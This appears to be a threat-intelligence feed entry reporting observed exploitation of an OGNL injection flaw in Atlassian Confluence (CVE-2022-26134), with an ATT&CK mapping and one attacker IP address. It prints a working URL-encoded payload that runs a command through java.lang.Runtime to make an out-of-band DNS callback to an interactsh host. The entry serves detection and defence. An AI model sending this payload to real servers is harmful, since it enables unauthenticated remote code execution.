Confluence OGNL Expression Injection for 2026-03-02
Mar 02, 2026
WebExploit
Last Updated: 12:16 UTC
OGNL (Object-Graph Navigation Language) expression injection in Atlassian Confluence achieving unauthenticated RCE. The URL-encoded prefix %24%7B%40java.lang (${@java.lang) is the invariant for CVE-2022-26134 and related injection variants. Active exploitation includes OOB DNS callback canaries via interactsh.
CVE References
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d6igebqgp6g990a2g0ugixtqyyd6jx4f7.oast.pro%22%29%7D//%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20d6igebqgp6g990a2g0ug58xsra5bdxyq9.oast.pro%22%29%7D/
Attackers by Country
IP Address : ASN : City/Provider
- 198.167.197.162 : AS39287 ab stract : Sweden